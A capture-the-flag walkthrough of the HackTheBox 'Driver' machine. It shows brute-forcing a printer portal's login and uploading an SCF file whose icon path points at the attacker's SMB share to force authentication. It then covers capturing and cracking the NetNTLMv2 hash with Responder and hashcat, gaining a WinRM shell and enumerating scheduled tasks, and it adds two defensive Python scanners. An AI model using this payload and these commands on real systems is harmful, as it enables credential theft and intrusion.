HTB Driver Walkthrough

A technical walkthrough of the HackTheBox DRIVER challenge, by Andy From Italy.


Hello infosec friends! Once again, HTB cheers us up with a simple BOX, in which a pinch of code makes it even more interesting. Let's begin and jump right in!

As always we begin with the nmap scan:

Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-23 12:31 CEST
Nmap scan report for 10.10.11.106
Host is up (0.045s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE      VERSION
80/tcp  open  http         Microsoft IIS httpd 10.0
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp open  msrpc        Microsoft Windows RPC
445/tcp open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h14m58s, deviation: 0s, median: 7h14m57s
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-10-23T17:47:02
|_  start_date: 2021-10-23T16:55:58

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.59 seconds

As expected for a Windows machine (confirmed by the scan), in addition to port 80 we find the standard ports 135 (MSRPC) and 445 (SMB), the Windows-native file-sharing protocol, which take the place of SSH here.

As usual, I add the hostname I will use in place of the machine's IP address, following the HTB convention (so driver.htb), to my /etc/hosts file.

It appears that the portal is protected by HTTP basic authentication with a domain user account. Either way, SMB can give us some interesting information if it is configured the right way... or the wrong way! :D

┌──(in7rud3r㉿Mykali)-[~/Dropbox/hackthebox/_10.10.11.106 - Driver (win)]
└─$ smbclient -L 10.10.11.106 -N                                                                             130 ⨯
session setup failed: NT_STATUS_ACCESS_DENIED

┌──(in7rud3r㉿Mykali)-[~/Dropbox/hackthebox/_10.10.11.106 - Driver (win)]
└─$ rpcclient -U "" -N 10.10.11.106                                                                            1 ⨯
Cannot connect to server.  Error was NT_STATUS_ACCESS_DENIED

┌──(in7rud3r㉿Mykali)-[~/Dropbox/hackthebox/_10.10.11.106 - Driver (win)]
└─$ enum4linux -a 10.10.11.106                                   
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Oct 23 12:40:56 2021

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.11.106
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ==================================================== 
|    Enumerating Workgroup/Domain on 10.10.11.106    |
 ==================================================== 
[E] Can't find workgroup/domain


 ============================================ 
|    Nbtstat Information for 10.10.11.106    |
 ============================================ 
Looking up status of 10.10.11.106
No reply from 10.10.11.106

 ===================================== 
|    Session Check on 10.10.11.106    |
 ===================================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[E] Server doesn't allow session using username '', password ''.  Aborting remainder of tests.

It doesn't seem to be our case: anonymous access is denied everywhere. However, I have a couple of ideas in mind. First of all, let's scan the UDP ports as well.

┌──(in7rud3r㉿Mykali)-[~/Dropbox/hackthebox/_10.10.11.106 - Driver (win)]
└─$ sudo nmap -sU -T4 10.10.11.106                                                                           130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-23 14:02 CEST
Nmap scan report for driver.htb (10.10.11.106)
Host is up (0.065s latency).
All 1000 scanned ports on driver.htb (10.10.11.106) are open|filtered

Nmap done: 1 IP address (1 host up) scanned in 67.06 seconds

Nothing. Ok, I could extend the scan to non-standard ports, but first let's run a dictionary brute-force against the basic authentication on port 80 to identify a misconfigured user.

┌──(in7rud3r㉿Mykali)-[~/Dropbox/hackthebox]
└─$ nmap -p80 --script http-brute 10.10.11.106
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-23 13:57 CEST
Nmap scan report for driver.htb (10.10.11.106)
Host is up (0.55s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-brute: 
|   Accounts: 
|     admin:admin - Valid credentials
|_  Statistics: Performed 45009 guesses in 473 seconds, average tps: 93.2

Nmap done: 1 IP address (1 host up) scanned in 474.96 seconds

I can't believe it; sometimes the simplest and most unlikely solution is the right one: the user "admin" with the password "admin"... not even a novice system administrator would do that.

Perfect. The portal appears to be a site for updating the firmware of a printer which, shortly afterwards, a Google search lets me identify as a Ricoh model (obviously it would have been enough to look at the name of the image file).

Next step: researching exploits for this type of printer, perhaps targeting the firmware specifically. I report a series of links that caught my interest while looking for ways to bypass the security of this portal through the features it offers. In particular, the most recent CVE took up most of my time (on GitHub alone about 12 repositories come up for it), but none of them produced anything useful.

https://www.cybersecurity-help.cz/vdb/SB2020012421
https://www.cybersecurity-help.cz/exploits/25569/?ref=bulletin
https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/
http://hacking-printers.net/wiki/index.php/Firmware_updates
https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7547

So I go back to browsing the portal and, after finding the message "Our testing team will review the uploads manually and initiates the testing soon." and cross-referencing it with a forum post suggesting the use of Responder, a little research leads me to the following link:

Forced Authentication - Red Teaming Experiments
Credential Access, Stealing hashes

The idea is to prepare a simple script file that Windows Explorer interprets; as soon as someone browses the folder containing it, the forced authentication is triggered (presumably a process scheduled on the machine simulates the work of this hypothetical user). Let's try it: start Responder, upload the script via the firmware update form and wait.

Here is my script file (in SCF format):

[Shell]
Command=2
IconFile=\\10.10.15.131\tools\nc.ico
[Taskbar]
Command=ToggleDesktop

So, when Explorer renders the folder it will try to connect to my fake SMB share to fetch the icon, and Responder will capture the authentication request.
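A portal like this one accepts any upload and later has a user browse the upload folder in Explorer, so the natural server-side mitigation is to refuse files that Explorer interprets rather than stores. The following scanner is an added example written for this walkthrough (it is not code from the post, from Responder or from the box): it flags uploads by Explorer-interpreted extension and, independently of the extension, by SCF/URL content whose IconFile (or a similar key) points at a UNC path, so a renamed SCF file is still caught. The sample uploads are constructed; the SCF content is the one shown above.

```python
import re
from pathlib import PureWindowsPath

# Extensions Explorer interprets as shell/shortcut files rather than plain data.
SHORTCUT_EXTENSIONS = {".scf", ".url", ".lnk", ".library-ms", ".searchconnector-ms"}

# INI-style keys whose value may be a UNC path (\\host\share\...) that Explorer
# resolves on its own as soon as the folder is rendered.
UNC_KEY_RE = re.compile(
    r"(?im)^\s*(IconFile|IconPath|URL|WorkingDirectory)\s*=\s*(\\\\[^\\\s]+\\\S*)"
)
SHELL_SECTION_RE = re.compile(r"(?im)^\s*\[(Shell|InternetShortcut)\]")


def scan_upload(name: str, data: bytes) -> list:
    """Return a list of human-readable findings for one uploaded file."""
    findings = []
    ext = PureWindowsPath(name).suffix.lower()
    if ext in SHORTCUT_EXTENSIONS:
        findings.append(f"{name}: extension {ext} is interpreted by Explorer, not stored as data")
    # SCF and URL files are plain INI text; inspect the content regardless of
    # the declared extension so a renamed file is still caught.
    text = data.decode("utf-8", errors="ignore")
    if SHELL_SECTION_RE.search(text):
        for key, target in UNC_KEY_RE.findall(text):
            host = target.split("\\")[2]
            findings.append(f"{name}: {key} points at UNC path on host {host}")
    return findings


def scan_uploads(uploads: dict) -> dict:
    """Scan a mapping of filename -> bytes and keep only the files with findings."""
    result = {}
    for name, data in uploads.items():
        found = scan_upload(name, data)
        if found:
            result[name] = found
    return result


# Constructed sample uploads (not captured from the box): the SCF file from the
# walkthrough, a benign firmware image, a .url shortcut with a UNC icon and a
# plain text file.
SCF_SAMPLE = "\r\n".join([
    "[Shell]",
    "Command=2",
    r"IconFile=\\10.10.15.131\tools\nc.ico",
    "[Taskbar]",
    "Command=ToggleDesktop",
]).encode()

SAMPLE_UPLOADS = {
    "update.scf": SCF_SAMPLE,
    "firmware_v4.23.bin": b"\x00\x01RICOH-FW\x00" + bytes(32),
    "readme.url": b"[InternetShortcut]\r\nURL=http://example.invalid/\r\n"
                  b"IconFile=\\\\fileserver\\share\\icon.ico\r\nIconIndex=0\r\n",
    "notes.txt": b"Firmware notes for the Ricoh driver.\r\n",
}

if __name__ == "__main__":
    for name, found in scan_uploads(SAMPLE_UPLOADS).items():
        for line in found:
            print("REJECT", line)
```

Rejecting by content as well as by extension matters because Explorer only honours the .scf extension, but an upload handler that renames files on storage can accidentally give a renamed payload its dangerous extension back.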

┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.11.106 - Driver (win)/attack/scf]
└─$ sudo responder -I tun0 -A                                                                                255 ⨯
[sudo] password for in7rud3r: 
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.0.6.0

  Author: Laurent Gaffie ([email protected])
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    DNS/MDNS                   [ON]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [ON]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Fingerprint hosts          [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.15.131]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']

[+] Current Session Variables:
    Responder Machine Name     [WIN-CRIKFDX5I7V]
    Responder Domain Name      [2PCL.LOCAL]
    Responder DCE-RPC Port     [48461]
[i] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.
[Analyze mode: ICMP] You can ICMP Redirect on this network.
[Analyze mode: ICMP] This workstation (10.10.15.131) is not on the same subnet than the DNS server (192.168.1.1).
[Analyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details.

[+] Listening for events...                                                                                        

[SMB] NTLMv2-SSP Client   : 10.10.11.106
[SMB] NTLMv2-SSP Username : DRIVER\tony
[SMB] NTLMv2-SSP Hash     : tony::DRIVER:825df131f89f33d[...]
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony
[+] Exiting...

Cool, it looks like a certain "tony" fell into the trap and tried to access my share. But let's try to explain how Responder works.

The victim's PC (in a standard scenario) will try to access a share for which it does not know the IP address (usually a machine on the network identified by a host name rather than by an IP). It will then ask the DNS server to resolve the server name (1), but the DNS server will not be able to resolve it (2), so the victim's PC will start broadcasting a message to all the machines on the network, looking for the right server (3). In our case, my address is already hard-wired into the file, so this step will probably be skipped and it will start broadcasting directly. Our machine, with Responder listening, will capture the message and reply confirming that it is the server being looked for (4). At this point the share request is made (5), and Responder immediately replies by requesting the password hash for authentication (6). The victim, unaware, responds by sending its hash, believing it is logging into a real share (7). Unfortunately for the victim, this is captured and an error message is returned to the caller (8).

Ok, given this (hopefully exhaustive) explanation, let's proceed with a dictionary attack on the hash using hashcat to try to recover the password.

The hashcat hash-mode for the NetNTLMv2 hash captured from the share request is 5600.

┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.11.106 - Driver (win)/attack/scf]
└─$ hashcat -m5600 /usr/share/responder/logs/SMB-NTLMv2-SSP-10.10.11.106.txt /usr/share/wordlists/rockyou.txt --force 
hashcat (v6.1.1) starting...

You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
OpenCL API (OpenCL 2.0 pocl 1.8  Linux, None+Asserts, RELOC, LLVM 9.0.1, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i5-7300HQ CPU @ 2.50GHz, 4355/4419 MB (2048 MB allocatable), 2MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 14 digests; 13 unique digests, 13 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Not-Iterated

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 64 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

TONY::DRIVER:4e7a57926b3bf5af:b535670cc26961fb79c26cb9406d96f8:[...]:liltony
[...]
TONY::DRIVER:4aee2d2ad7ddfe1b:35cc3d2a2b4e9c1bae45399d84dda75b:0101000000000000008c256acfd1d701bddd21684fd5d9a900000000020008003200500043004c0001001e00570049004e002d004300520049004b00460044005800350049003700560004003400570049004e002d004300520049004b0046004400580035004900370056002e003200500043004c002e004c004f00430041004c00030014003200500043004c002e004c004f00430041004c00050014003200500043004c002e004c004f00430041004c0007000800008c256acfd1d70106000400020000000800300030000000000000000000000000200000941168e0803bc47af2807a23166642f2da31875a35905ca3c9718a637aba1f350a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310035002e00310033003100000000000000000000000000:liltony
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: NetNTLMv2
Hash.Target......: /usr/share/responder/logs/SMB-NTLMv2-SSP-10.10.11.106.txt
Time.Started.....: Thu Nov  4 23:03:18 2021, (1 sec)
Time.Estimated...: Thu Nov  4 23:03:19 2021, (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   626.6 kH/s (2.44ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 13/13 (100.00%) Digests, 13/13 (100.00%) Salts
Progress.........: 425984/186477005 (0.23%)
Rejected.........: 0/425984 (0.00%)
Restore.Point....: 30720/14344385 (0.21%)
Restore.Sub.#1...: Salt:12 Amplifier:0-1 Iteration:0-1
Candidates.#1....: !!!!!! -> eatme1

Started: Thu Nov  4 23:02:01 2021
Stopped: Thu Nov  4 23:03:21 2021

Great, the password seems to be "liltony". Let's try again on the SMB service of the Windows machine.

┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.11.106 - Driver (win)/attack/scf]
└─$ smbclient -L 10.10.11.106 -U DRIVER\\tony                                                                130 ⨯
Enter DRIVER\tony's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
SMB1 disabled -- no workgroup available

┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.11.106 - Driver (win)/attack/scf]
└─$ smbclient \\\\10.10.11.106\\C$ -U DRIVER\\tony
Enter DRIVER\tony's password: 
tree connect failed: NT_STATUS_ACCESS_DENIED

We don't seem to be very lucky today.

┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.11.106 - Driver (win)/attack/scf]
└─$ rpcclient -U "DRIVER\\tony" 10.10.11.106                                                                 130 ⨯
Enter DRIVER\tony's password: 
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[DefaultAccount] rid:[0x1f7]
user:[Guest] rid:[0x1f5]
user:[NewUser] rid:[0x3ed]
user:[Skriep] rid:[0x3ec]
user:[tony] rid:[0x3eb]

It will be better to use the go-to tool for accessing the remote machine: evil-WinRM, which, as I imagined, never disappoints.

┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.11.106 - Driver (win)/attack/scf]
└─$ sudo docker run --rm -ti --name evil-winrm -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 10.10.11.106 -u DRIVER\\tony -p 'liltony' -s '/ps1_scripts/' -e '/exe_files/'

[sudo] password for in7rud3r: 

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\tony\Documents> dir
*Evil-WinRM* PS C:\Users\tony\Documents> cd ..
*Evil-WinRM* PS C:\Users\tony> cd desktop
*Evil-WinRM* PS C:\Users\tony\desktop> dir


    Directory: C:\Users\tony\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        11/4/2021   5:10 PM             34 user.txt


*Evil-WinRM* PS C:\Users\tony\desktop> type user.txt
0******************************a

And with access to the system comes the first flag too. Okay, on to privilege escalation now. I provide an interesting link that reports some of the steps normally performed for this activity.

Guida alla Privilege Escalation nei sistemi Windows : Hacktips - Guide di Sicurezza Informatica e Hacking Etico
Hacktips - Guide di Sicurezza Informatica e Hacking Etico

Oops, really sorry for you, but I was very glad to find some links in Italian! ;P

Perfect, first of all let's list the scheduled tasks on this system (schtasks /query /fo LIST /v > lst.txt) and, since there will be a lot of information, it's better to write it to a file and download the output to our machine. To do this, evil-WinRM provides a couple of handy file transfer features built right into the shell.

*Evil-WinRM* PS C:\Users\tony\Documents> download lst.txt /data/lst.txt

Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command                                                                                     

Info: Downloading C:\Users\tony\Documents\lst.txt to /data/lst.txt

                                                             
Info: Download successful!

Remember that I launched evil-WinRM from a Docker container, so the paths to use are not the local ones of my machine but those mapped in the docker run command. Let's take a look at the file anyway.

┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.11.106 - Driver (win)/attack/upl]
└─$ more /home/foo/data/lst.txt 
��
Folder: \
HostName:                             DRIVER
TaskName:                             \OneDrive Standalone Update Task-S-1-5-21-3114857038-1253923253-2196841645-1003
Next Run Time:                        11/6/2021 2:02:58 PM
Status:                               Ready
[...]
HostName:                             DRIVER
TaskName:                             \VerifyFirmware
Next Run Time:                        N/A
Status:                               Running
Logon Mode:                           Interactive only
Last Run Time:                        11/6/2021 7:27:33 AM
Last Result:                          267009
Author:                               DRIVER\Administrator
Task To Run:                          C:\Users\tony\appdata\local\job\job.bat 
Start In:                             N/A
Comment:                              N/A
Scheduled Task State:                 Enabled
Idle Time:                            Disabled
Power Management:                     Stop On Battery Mode, No Start On Batteries
Run As User:                          tony
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A

Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft
INFO: There are no scheduled tasks presently available at your access level.
[...]

There is really a lot of information in this report; after spending a lot of time trying to understand what could be useful, I find a batch file that is worth analyzing (I report only the parts that seem useful for educational purposes).

*Evil-WinRM* PS C:\Users\tony\Documents> type C:\Users\tony\appdata\local\job\job.bat
@echo off

:LOOP

%SystemRoot%\explorer.exe "C:\firmwares"

ping -n 20 127.0.0.1 > nul && powershell -ep bypass c:\users\tony\appdata\local\job\quit.ps1

DEL /q C:\firmwares\*

cls

GOTO :LOOP

:EXIT

It seems to open the "firmwares" folder in the root of drive C: with Explorer and then run a script (c:\users\tony\appdata\local\job\quit.ps1) via PowerShell (I don't understand the ping on localhost made before it; maybe it's used as a kind of delay). It then deletes all the files in the "firmwares" folder (the files uploaded via the portal). Let's have a look at the PowerShell script too.

*Evil-WinRM* PS C:\Users\tony\Documents> type c:\users\tony\appdata\local\job\quit.ps1
$folder = [uri]'C:\firmwares'
foreach ($w in (New-Object -ComObject Shell.Application).Windows())
{ if ($w.LocationUrl -ieq $folder.AbsoluteUri)
        {$w.Quit(); break}
}

Yes, it appears to be what triggered our exploit: this explains how the previous intrusion could succeed. After a few more attempts with scripts and other things, I go back (as also suggested in the forum) to the output of the scheduled tasks. Unfortunately I can't find anything particularly interesting; there are only two tasks running for user "tony", and almost all the tasks running with administrator rights are of type "COM handler".

┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.11.106 - Driver (win)/attack/upl]
└─$ iconv -f utf-16 -t utf-8 lst.txt | grep -i "task to run" | grep -v "COM handler"
Task To Run:                          %localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe 
Task To Run:                          C:\Users\tony\appdata\local\job\job.bat 
Task To Run:                          %windir%\system32\appidpolicyconverter.exe 
Task To Run:                          %windir%\system32\appidcertstorecheck.exe 
Task To Run:                          %windir%\system32\compattelrunner.exe 
Task To Run:                          %windir%\system32\compattelrunner.exe 
Task To Run:                          %windir%\system32\compattelrunner.exe 
Task To Run:                          %windir%\system32\compattelrunner.exe -maintenance
Task To Run:                          %windir%\system32\rundll32.exe Startupscan.dll,SusRunTask
Task To Run:                          %windir%\system32\rundll32.exe Windows.Storage.ApplicationData.dll,CleanupTemporaryState
Task To Run:                          %windir%\system32\dstokenclean.exe 
Task To Run:                          %windir%\system32\rundll32.exe %windir%\system32\AppxDeploymentClient.dll,AppxPreStageCleanupRunTask
Task To Run:                          %windir%\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations
Task To Run:                          BthUdTask.exe $(Arg0)
Task To Run:                          %ProgramFiles%\CUAssistant\culauncher.exe 
Task To Run:                          %ProgramFiles%\CUAssistant\culauncher.exe 
Task To Run:                          %SystemRoot%\System32\wsqmcons.exe 
Task To Run:                          %windir%\system32\WSqmCons.exe -u
Task To Run:                          %windir%\system32\defrag.exe -c -h -o -$
Task To Run:                          %windir%\system32\cleanmgr.exe /autoclean /d %systemdrive%
Task To Run:                          %windir%\system32\rundll32.exe dfdts.dll,DfdGetDefaultPolicyAndSMART
Task To Run:                          %windir%\system32\DFDWiz.exe 
Task To Run:                          %windir%\system32\disksnapshot.exe 
Task To Run:                          %windir%\system32\dmclient.exe 
Task To Run:                          %windir%\System32\LocationNotificationWindows.exe 
Task To Run:                          %windir%\System32\WindowsActionDialog.exe 
Task To Run:                          %SystemRoot%\System32\MbaeParserTask.exe 
Task To Run:                          %windir%\system32\lpremove.exe 
Task To Run:                          %windir%\system32\gatherNetworkInfo.vbs 
Task To Run:                          %SystemRoot%\System32\drvinst.exe 6
Task To Run:                          %ProgramFiles%\rempl\sedlauncher.exe 
Task To Run:                          %windir%\System32\wpcmon.exe 
Task To Run:                          %windir%\system32\SpaceAgent.exe 
Task To Run:                          %windir%\system32\SpaceAgent.exe 
Task To Run:                          %windir%\system32\rundll32.exe sysmain.dll,PfSvWsSwapAssessmentTask
Task To Run:                          %windir%\system32\srtasks.exe ExecuteScheduledSPPCreation
Task To Run:                          %windir%\system32\sc.exe start w32time task_started
Task To Run:                          %windir%\system32\tzsync.exe 
Task To Run:                          %systemroot%\system32\usoclient.exe StartInstall
Task To Run:                          %systemroot%\system32\MusNotification.exe Display
Task To Run:                          %systemroot%\system32\usoclient.exe StartInstall
Task To Run:                          C:\Windows\system32\MusNotification.exe Reboot
Task To Run:                          %systemroot%\system32\usoclient.exe ResumeUpdate
Task To Run:                          %systemroot%\system32\usoclient.exe StartScan
Task To Run:                          %systemroot%\system32\usoclient.exe StartScan
Task To Run:                          %systemroot%\system32\usoclient.exe StartScan
Task To Run:                          C:\windows\system32\MusNotification.exe Display
Task To Run:                          C:\windows\system32\MusNotification.exe ReadyToReboot
Task To Run:                          sc.exe config upnphost start= auto
Task To Run:                          %SystemRoot%\System32\WiFiTask.exe 
Task To Run:                          %windir%\system32\wermgr.exe -upload
Task To Run:                          %windir%\system32\wermgr.exe -upload
Task To Run:                          %windir%\system32\wermgr.exe -upload
Task To Run:                          %windir%\system32\rundll32.exe bfe.dll,BfeOnServiceStartTypeChange
Task To Run:                          "%ProgramFiles%\Windows Media Player\wmpnscfg.exe" 
Task To Run:                          C:\Windows\system32\sc.exe start wuauserv
Task To Run:                          C:\Windows\system32\sc.exe start wuauserv
Task To Run:                          C:\Windows\system32\sc.exe start wuauserv
Task To Run:                          C:\Windows\system32\sc.exe start wuauserv
Task To Run:                          %systemroot%\System32\sihclient.exe 
Task To Run:                          %systemroot%\System32\sihclient.exe /boot
Task To Run:                          %SystemRoot%\System32\dsregcmd.exe 

These are the tasks on the machine; I exclude the lines containing "COM handler" to better identify the tasks of other types. The iconv command converts the file from UTF-16 (the encoding PowerShell used when redirecting the output) to UTF-8, to avoid display and grep problems.
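The same filtering done here with iconv and grep can be turned into a small audit. The following is an added example (not code from the post) that decodes the UTF-16 output of schtasks /query /fo LIST /v, splits it into one record per task, drops COM handlers, and flags tasks whose command lives in a user-writable location or whose author (in DOMAIN\user form) is a different account from the one the task runs as. That is exactly the VerifyFirmware pattern seen above: authored by DRIVER\Administrator, running C:\Users\tony\appdata\local\job\job.bat as tony. The sample listing is constructed from the records shown in the post.

```python
import codecs
import re
from typing import Dict, List, Tuple

# schtasks LIST output is "Key:<padding>Value"; the value starts after two or more spaces.
FIELD_RE = re.compile(r"^(.*?):\s{2,}(.*)$")

# Locations a standard user can write to: a task command stored there can be
# replaced by that user or by anything already running as that user.
USER_WRITABLE_RE = re.compile(
    r'(?i)^"?(?:%localappdata%|%appdata%|%temp%|%tmp%|%userprofile%|[a-z]:\\users\\)'
)


def decode_schtasks_output(raw: bytes) -> str:
    """PowerShell's '>' redirection writes UTF-16LE with a BOM (the reason the
    walkthrough needed iconv before grep); decode accordingly."""
    if raw.startswith(codecs.BOM_UTF16_LE) or raw.startswith(codecs.BOM_UTF16_BE):
        return raw.decode("utf-16")
    return raw.decode("utf-8", errors="replace")


def parse_tasks(text: str) -> List[Dict[str, str]]:
    """Split the verbose listing into one dict per task (a record starts at HostName:)."""
    tasks, current = [], {}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if not m:
            continue                      # "Folder: \" headers, INFO lines, blanks
        key, value = m.group(1).strip(), m.group(2).strip()
        if key == "HostName" and current:
            tasks.append(current)
            current = {}
        current[key] = value
    if current:
        tasks.append(current)
    return tasks


def suspicious_tasks(tasks: List[Dict[str, str]]) -> List[Tuple[str, str, List[str]]]:
    """Flag non-COM-handler tasks with a user-writable command or a run-as
    account that differs from a DOMAIN\\user author."""
    flagged = []
    for t in tasks:
        cmd = t.get("Task To Run", "")
        if cmd == "COM handler":
            continue
        reasons = []
        if USER_WRITABLE_RE.match(cmd):
            reasons.append("command lives in a user-writable location")
        author, run_as = t.get("Author", ""), t.get("Run As User", "")
        if "\\" in author and run_as and \
                author.split("\\")[-1].lower() != run_as.split("\\")[-1].lower():
            reasons.append(f"authored by {author} but runs as {run_as}")
        if reasons:
            flagged.append((t.get("TaskName", "?"), cmd, reasons))
    return flagged


# Constructed sample listing, UTF-16LE with BOM like the real lst.txt.
SAMPLE_TEXT = """\
Folder: \\
HostName:                             DRIVER
TaskName:                             \\OneDrive Standalone Update Task-S-1-5-21-3114857038-1253923253-2196841645-1003
Status:                               Ready
Author:                               Microsoft Corporation
Task To Run:                          %localappdata%\\Microsoft\\OneDrive\\OneDriveStandaloneUpdater.exe
Run As User:                          tony
HostName:                             DRIVER
TaskName:                             \\VerifyFirmware
Status:                               Running
Author:                               DRIVER\\Administrator
Task To Run:                          C:\\Users\\tony\\appdata\\local\\job\\job.bat
Run As User:                          tony
Schedule Type:                        At logon time
Folder: \\Microsoft\\Windows\\Application Experience
HostName:                             DRIVER
TaskName:                             \\Microsoft\\Windows\\Application Experience\\Microsoft Compatibility Appraiser
Status:                               Ready
Author:                               Microsoft Corporation
Task To Run:                          %windir%\\system32\\compattelrunner.exe
Run As User:                          SYSTEM
HostName:                             DRIVER
TaskName:                             \\Microsoft\\Windows\\AppID\\EDP Policy Manager
Status:                               Ready
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Run As User:                          SYSTEM
"""
SAMPLE_RAW = codecs.BOM_UTF16_LE + SAMPLE_TEXT.encode("utf-16-le")

if __name__ == "__main__":
    for name, cmd, reasons in suspicious_tasks(parse_tasks(decode_schtasks_output(SAMPLE_RAW))):
        print(name, "->", cmd, "|", "; ".join(reasons))
```

On a hardened host the fix for the flagged record is to store the task's script under a directory only administrators can write to, so that a compromised low-privilege account cannot swap the command the task runs.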

Task To Run:                          %localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe 
Status:                               Running
[...]
Task To Run:                          %windir%\system32\lpremove.exe 
Status:                               Running
[...]
Task To Run:                          %windir%\system32\srtasks.exe ExecuteScheduledSPPCreation
Status:                               Running
[...]
Task To Run:                          %systemroot%\System32\sihclient.exe /boot
Status:                               Running

Other running tasks that I investigated, but which led me nowhere. A little demoralized, I decide to switch to another very effective tool for finding possible privilege-escalation vulnerabilities: winPEAS.

